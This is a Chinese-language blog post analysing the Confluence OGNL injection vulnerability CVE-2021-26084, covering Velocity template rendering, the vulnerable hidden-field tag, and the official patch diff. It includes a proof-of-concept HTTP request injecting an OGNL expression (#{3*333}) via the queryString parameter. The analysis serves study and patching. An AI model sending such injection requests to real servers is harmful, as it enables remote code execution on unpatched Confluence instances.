CVE-2021-26084 漏洞分析

最新推荐文章于 2024-04-05 07:45:50 发布
最新推荐文章于 2024-04-05 07:45:50 发布
阅读量176 收藏
点赞数
文章标签: 安全 python tornado dash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/why811/article/details/133887728
版权

基础知识

Velocity

  • .vm 结尾的文件一般为Velocity模板文件
  • $action
    • $action 是 velocity 上下⽂中的⼀个变量,⼀般在进⾏模板渲染前会设置到 context ⾥⾯。
    • $action 是当前访问路由对应的具体 Action 类。
    • $action.xxx 表⽰取对应 Action 类的 xxx 属性值

  • ${} 和 $!{}
    • ${} 输出表达式的计算结果,并进行过滤
    • $!{} 原样输出表达式的计算结果,不进行任何过滤
  • Velocity自定义标签
    • velocity ⾃定义的标签必须实现 Directive 类的 getName()、getType()、render() 三个⽅法。
    • getName() ⽅法表⽰标签的名字;getType() ⽅法则表⽰是⾏标签(LINE) 还是块标签(BLOCK); render() ⽅法则⽤来实现标签的具体处理逻辑。
  • velocity.properties 文件
    • 模板引擎初始化时会加载此文件
    • 配置log, 字符集编码等

    • userdirective:自定义函数路径

WebWork

  • 路由逻辑

Confluence

  • Confluence 7.12.3 依赖 Velocity 1.6.4
  • Confluence 自定义 Velocity 标签 Tag

OGNL表达式注入

漏洞环境版本

  • 7.12.3

漏洞原理

  • Confluence自定义的tag标签在渲染过程中在渲染$!的变量时会使用Ognl表达式来渲染
  • 检查手段被绕过
  • POC
POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

queryString=aaaa\u0027%2b#{3*333}%2b\u0027bbb
  • 对应模板文件: confluence/pages/createpage-entervariables.vm
<html>
    <head>
        #requireResource("confluence.web.resources:page-templates")
        <title>$action.getText("page.template.wizard")</title>
    </head>

    <body>
        #parse ( "/template/includes/actionerrors.vm" )
        #applyDecorator("root")
        #decoratorParam("helper" $action.helper)
        #decoratorParam("context" "space-pages")
        #decoratorParam("mode" "create-page")

        <div class="padded">
            <div class="steptitle" style="margin-top: 10px">$action.getText('pagevariables.step2')</div>
            <p>$action.getText('text.pagevariables.step2.instructions')</p>

            <div class="smallfont view-template">
                <div class="wiki-content">$action.renderedTemplateContent</div>
            </div>

            <form name="filltemplateform" method="POST" action="doenterpagevariables.action">
                #form_xsrfToken()
                #tag ("Hidden" "name='queryString'" "value='$!queryString'")
                #tag ("Hidden" "name='templateId'" "value='$pageTemplate.id'")
                #tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")
                #tag ("Hidden" "name='title'" "value=title")
                #tag ("Hidden" "name='parentPageId'" "value=parentPageId")
                #tag ("Hidden" "name='fromPageId'" "value=fromPageId")
                #tag ("Hidden" "name='spaceKey'" "value=spaceKey")

                <div class="aui-toolbar2" role="toolbar">
                    <div class="aui-toolbar2-inner">
                            <input class="aui-button" type="button" value="$action.getText('back.witharrows.name')" onclick="javascript:history.go(-1)">
                            #tag( "Submit" "name='confirm'" "id=confirm" "value='next.name'" "theme='notable'" "cssClass='aui-button'")
                    </div>
                </div>
            </form>

            #parse ( "/pages/page-breadcrumbs.vm" )
        </div>

        #end
    </body>
</html>

漏洞修复

补丁

  • 补丁脚本运行结果
File 1: 'confluence/users/user-dark-features.vm':
   a. backing up file.. done
   b. updating file.. done
   c. showing file changes..
70c70
<             #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value='$!action.featureKey'" "theme='aui'" "template='text.vm'")
---
>             #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value=featureKey" "theme='aui'" "template='text.vm'")
   d. validating file changes.. ok
   e. file updated successfully!

File 2: 'confluence/login.vm':
   a. backing up file.. done
   b. updating file.. done
   c. showing file changes..
147c147
<                         #tag( "Hidden" "name='token'" "value='$!action.token'" )
---
>                         #tag( "Hidden" "name='token'" "value=token" )
   d. validating file changes.. ok
   e. file updated successfully!

File 3: 'confluence/pages/createpage-entervariables.vm':
   a. backing up file.. done
   b. updating file.. done
   c. showing file changes..
24c24
<                 #tag ("Hidden" "name='queryString'" "value='$!queryString'")
---
>                 #tag ("Hidden" "name='queryString'" "value=queryString")
26c26
<                 #tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")
---
>                 #tag ("Hidden" "name='linkCreation'" "value=linkCreation")
   d. validating file changes..ok
   e. file updated successfully!

File 4: 'confluence/template/custom/content-editor.vm':
   a. backing up file.. done
   b. updating file.. done
   c. showing file changes..
64c64
<         #tag ("Hidden" "name='queryString'" "value='$!queryString'")
---
>         #tag ("Hidden" "name='queryString'" "value=queryString")
85c85
<             #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value='${templateId}'")
---
>             #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value=templateId")
   d. file updated successfully!

File 5: 'confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader*.jar':
   a. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar..
Archive:  confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar
  inflating: ./templates/editor-preload-container.vm
   b. updating file.. done
   c. showing file changes..
56c56
< #tag ("Hidden" "id=syncRev" "name='syncRev'" "value='$!{action.syncRev}'")
---
> #tag ("Hidden" "id=syncRev" "name='syncRev'" "value=syncRev")
   d. validating file changes.. ok
   e. updating confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar with ./templates/editor-preload-container.vm..updating: templates/editor-preload-container.vm (deflated 59%)
-rw-r--r--  1 zhangxinqi  staff  13369  8 27 02:02 confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar
   f. cleaning up temp files..ok
   g. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar again to check changes within JAR..
Archive:  confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar
  inflating: ./templates/editor-preload-container.vm
   h. validating file changes for file within updated JAR.. ok
   i. cleaning up temp files..ok

Update completed!
  • 将模板文件中的$!删除
  • $action $!action 都删除
  • 所有的改动都位于tag标签下
  • 涉及5个文件的更改

参考资料

why811
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Atlassian Confluence 远程代码执行漏洞复现(CVE-2021-26084)
0xSec
01-17 1257
Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。
Confluence漏洞学习——CVE-2021-26084/85,CVE-2022-26134漏洞复现
记录并分享学习安全的知识点..
07-24 2874
​ Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码。 ​.........
CVE-2021-26084(confluence)(2),2024网络安全岗面试题知识点小结
最新发布
m0_60666841的博客
04-05 825
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Atlassian Confluence OGNL表达式注入代码执行漏洞CVE-2021-26084)
wangqiao258的博客
10-13 2880
环境搭建: 使用vulhub,进入文件夹启动环境: docker-compose up -d 环境启动后,访问http://your-ip:8090即可进入安装向导,参考CVE-2019-3396这个环境中的安装方法,申请试用版许可证。在填写数据库信息的页面,PostgreSQL数据库地址为db,数据库名称confluence,用户名密码均为postgres。 漏洞复现: POST /pages/createpage-entervariables.action HTTP/1.1 Host: 192.168
CVE-2021-26084——Confluence OGNL 注入漏洞分析
战神/calmness的博客
09-04 2140
简述 2021年08月26日,Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2021-26084,漏洞等级:严重,漏洞评分:8.8。目前该漏洞安全补丁已更新。 Confluence是Atlassian公司的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki,因此,Confluence的使用面很广。在某些情况下,未授权的攻击者可以构造特殊的请求,造成远程代码执行。 影响版本 组件
Confluence CVE-2021-26084远程代码执行漏洞复现
热门推荐
Websec
09-08 1万+
一、漏洞概述 近日,Atlassian官方发布了ConfluenceServerWebworkOGNL注入漏洞CVE-2021-26084)的安全公告,远程攻击者在经过身份验证或在特定环境下未经身份验证的情况下,可构造OGNL表达式进行注入,实现在 Confluence Server或Data Center上执行任意代码,CVSS评分为9.8。请相关用户尽快采取措施进行防护。 Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,...
CVE-2021-26084
weixin_51387754的博客
09-23 2181
在 Confluence Server 和 Data Center 的受影响版本中,存在 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码。受影响的版本分别为 6.13.23 之前的版本、7.4.11 之前的 6.14.0 版本、7.11.6 之前的 7.5.0 版本和 7.12.5 之前的 7.12.0 版本。 #!/usr/bin/env python3 # -*- encoding: utf-8 -*- """ @File :
CVE-2021-26084(confluence)
sinat_42420072的博客
01-26 1192
Confluence Server、Confluence Data Center等产品存在OGNL 注入漏洞,允许经过身份验证的用户(在某些情况下的未经身份验证的用户)在 Confluence Server或Confluence Data Center实例上执行任意代码。
详述近期遭利用的 Atlassian Confluence OGNL 注入漏洞 (CVE-2021-26084)
smellycat000的专栏
10-14 2316
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士趋势科技公司的研究团队详述了CVE-2021-26084 的根因。Atlassian Confluence Server and Dat...
Confluence 修复 CVE-2021-26084 OGNL注入漏洞
weixin_56306210的博客
06-21 1576
Confluence 修复 CVE-2021-26084 OGNL注入漏洞
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
【技术分享】vCenter Server CVE-2021-21985 RCE分析 .pdf
09-05
【技术分享】vCenter Server CVE-2021-21985 RCE分析 业务安全 安全研究 网络安全 威胁情报 安全实践
通报:Confluence远程代码执行漏洞CVE-2021-26084)被黑产大规模利用
qcloud_security的博客
09-06 1771
8月26日,Atlassian官方发布公告,披露了一个Atlassian Confluence 远程代码执行漏洞CVE-2021-26084),攻击者利用漏洞可完全控制服务器。8月31日晚,腾讯云原生安全漏洞检测响应平台通过主机安全(云镜)检测到首个利用该漏洞的在野攻击案例。 腾讯安全旗下全系列企业级产品均已支持检测防御利用Atlassian Confluence远程代码执行漏洞的攻击活动。 腾讯云上安全产品全栈提供针对Confluence远程代码执行漏洞的检测防护能力,政企用户运维人员.
盘点 | 2021年十大网络安全漏洞
weixin_53018687的博客
04-21 6144
漏洞与信息化进程相伴而生,为加强网络安全防护、避免漏洞所引发的威胁,漏洞管理成为重要IT策略。2021年,因漏洞导致的各类安全事件频发,涉及经济、民生的方方面面,提高安全意识已势在必行。以下为中科三方梳理的2021年十大网络安全漏洞,一起来看下吧。 一、Apache Log4j2 远程代码执行漏洞 Apache Log4j2是一个基于Java的日志记录工具,该日志框架被大量用于业务系统开发,用来记录日志信息。 Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,攻击者仅仅需要向目标服务器发送精心构造的
Apache Druid (CVE-2021-25646)远程代码执行漏洞复现
ximo的博客
04-27 737
漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以
cve-2021-33044
08-15
CVE-2021-33044是一种安全漏洞,影响了某个软件或系统。根据CVE编号,我们可以查看相应的安全公告和报告,以了解该漏洞的详细信息。 由于题目中没有提供CVE-2021-33044的具体信息,因此无法给出相关的技术细节或影响范围。要对该漏洞做进一步的分析和回答,我们需要获取更多的信息,例如受影响系统的类型、版本号,以及漏洞的描述和可能的攻击向量等。 一般来说,CVE-2021-33044所描述的漏洞可能具有某种安全风险,可能会被攻击者利用来破坏系统的机密性、完整性或可用性。它可能会导致数据泄露、拒绝服务攻击、远程命令执行等安全问题。 为了保护受影响的系统,应该查阅相应的安全公告和厂商发布的修复补丁。及时应用安全更新是防范此类漏洞攻击的最佳措施。同时,也建议定期进行系统漏洞扫描和安全性评估,以确保系统安全最大化。 总之,对于CVE-2021-33044这个具体漏洞,我们需要详细了解它的背景和技术细节才能提供更具体的回答和建议。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值